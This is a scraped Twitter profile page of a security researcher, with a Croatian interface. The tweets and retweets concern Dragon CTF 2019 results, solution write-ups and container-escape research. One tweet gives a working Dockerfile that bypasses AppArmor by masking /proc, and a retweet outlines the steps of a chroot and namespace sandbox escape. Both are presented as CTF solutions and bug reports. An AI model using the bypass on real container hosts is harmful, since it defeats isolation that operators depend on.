Twitter | Pretraživanje | |
Adam Iwaniuk
Cybersecurity
13
Tweetovi
128
Pratim
530
Osobe koje vas prate
Tweetovi
Adam Iwaniuk proslijedio/la je tweet
Dragon Sector 2. sij
2019 was a great year for Dragon Sector! 🏆1st place at global ranking for the 2nd year in a row & 3rd time in the history of our team 🥇1st place at 2 CTFs 🥈2nd place at 5 CTFs 🥉3rd place at 5 CTFs 💻And also organized a well received Dragon CTF 2019!
Reply Retweet Označi sa "sviđa mi se"
Adam Iwaniuk proslijedio/la je tweet
Dragon Sector 18. stu
We've released our solution slides for the Dragon CTF 2019: See also:
Reply Retweet Označi sa "sviđa mi se"
Adam Iwaniuk proslijedio/la je tweet
Dragon Sector 16. stu
Congratz to DragonCTF 2019 winners! TOP1: p4 () TOP2: PPP () TOP3: ALLES! () GG, WP!
Reply Retweet Označi sa "sviđa mi se"
Adam Iwaniuk proslijedio/la je tweet
leoluk@chaos.social 22. ruj
Odgovor korisniku/ci @adam_iwaniuk @allesctf
Our writeup/bug report for the AppArmor bypass:
Reply Retweet Označi sa "sviđa mi se"
Adam Iwaniuk proslijedio/la je tweet
Borys Popławski 22. ruj
Trusted Loading 2 solution (from DragonCTF 2019 Teaser): - get a not chrooted process from stage1 (in trusted loader's ns) - symlink chroot dir to / - spawn new process in the sandbox (now not chrooted) - unshare user,pid,mount ns - mount proc, get fd for /proc/self/ns/user (1/2)
Reply Retweet Označi sa "sviđa mi se"
Adam Iwaniuk proslijedio/la je tweet
A girl has no name 🏳️‍⚧️ 22. ruj
Here's a little something that I made for (now-finished) Dragon CTF 2019 Teaser by : (blackbox CPU reverse engineering) — have fun!
Reply Retweet Označi sa "sviđa mi se"
Adam Iwaniuk 22. ruj
Odgovor korisniku/ci @DragonSectorCTF @allesctf
It was intended solution to one of the challenges in DragonCTF organized by this weekend. It was solved by one team, congratulations!
Reply Retweet Označi sa "sviđa mi se"
Adam Iwaniuk 22. ruj
Docker apparmor bypass: FROM ubuntu:18.04 # get rid of procfs VOLUME /proc # fake files to avoid fail on run COPY empty /proc/self/attr/exec COPY empty /proc/self/fd/4 COPY empty /proc/self/fd/5 COPY empty /proc/self/status # cmd will not have apparmor restrictions CMD YOUR_CMD
Reply Retweet Označi sa "sviđa mi se"
Adam Iwaniuk proslijedio/la je tweet
Dragon Sector 18. ruj
Teaser Dragon CTF 2019 is taking place this weekend! Sat, 21 Sept. 2019, 12:00 UTC — Sun, 22 Sept. 2019, 12:00 UTC Format: online, jeopardy, team-based (no size limit), teaser, ranked 𝑯𝒂𝒗𝒆 𝑭𝒖𝒏 𝑮𝒐𝒐𝒅 𝑳𝒖𝒄𝒌! (1/4)
Reply Retweet Označi sa "sviđa mi se"
Adam Iwaniuk proslijedio/la je tweet
qwertyoruiop 29. ožu
CCC CTF is the new Pwn2Own
Reply Retweet Označi sa "sviđa mi se"
Adam Iwaniuk 29. ožu
Odgovor korisniku/ci @_tsuro @_niklasb @sirdarckcat
Yep, I found this while solving filemanager challange by and managed to solve it using this. Then I reported this to chromium.
Reply Retweet Označi sa "sviđa mi se"
Adam Iwaniuk proslijedio/la je tweet
Borys Popławski 12. velj
Check out our blog post about research and I did that lead to CVE-2019-5736!
Reply Retweet Označi sa "sviđa mi se"
Adam Iwaniuk proslijedio/la je tweet
stephen 12. velj
If you enjoyed that recent runc bug you should try out my namespace challenge from the :
Reply Retweet Označi sa "sviđa mi se"